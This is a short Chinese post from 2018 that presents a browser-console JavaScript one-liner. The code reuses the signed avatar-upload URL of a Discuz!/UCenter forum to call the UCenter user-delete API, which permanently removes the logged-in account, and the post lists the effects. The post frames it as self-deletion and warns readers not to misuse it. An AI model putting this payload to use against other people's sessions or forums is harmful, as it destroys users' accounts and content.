删除任意 discuz 论坛的账号漏洞

小执念 · 2018-10-21 20:25

测试了一下，适用于所有版本的discuz程序，包括最新版！

漏洞说明:

1、执行后，如果显示大于 0 的整数，说明帐号删除成功。
2、删除的是 UCenter 内的帐号，UCenter 会通知 Discuz! 删除用户帐号。
3、通知可能出现延迟，或不成功。因此可能不会立即登出网站
4、如果通知最终成功，该帐号及其所有帖子都会从 Discuz! 中删除。
5、如果通知不成功，帐号登出后也将无法登录。此时可以注册一个新的同名帐号，覆盖原帐号。原帐号信息将被删除，其帖子将无法阅读（但不会删除）。

没有后悔药，自己其他网站的账号请不要胡乱操作！

步骤：F12 --> 在 Console 中输入：

location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的ID？'))?d:'';

复制代码

然后按下回车：